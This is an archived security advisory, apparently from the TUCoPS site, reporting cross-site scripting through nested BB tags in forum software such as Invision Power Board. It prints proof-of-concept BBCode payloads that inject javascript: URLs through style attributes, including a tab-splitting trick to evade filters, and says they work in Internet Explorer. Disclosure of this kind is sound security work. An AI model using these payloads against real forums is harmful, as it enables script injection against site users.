Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!

TUCoPS :: Web BBS :: etc :: hack7026.htm

XSS in the nested BB tag in many forum
XSS in the nested BB tag in many forum

XSS was found in the nested BB tag in many forum:

Invision Power Board:
style=background:url(javascript:alert()) [/COLOR]

[EMAIL=[URL=s as=`s@wew.ew]mailto:assss@wew.ew] 
sssssss[/URL][/EMAIL]` style=`background:url(javaSCrip
t:alert(/Hi_from_Algol/))` (using tab between "javaSCrip" and "t")


Other forum and other BB tag may be vulnerable. Examples above work only in
Internet Explorer.

More info - and

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2015 AOH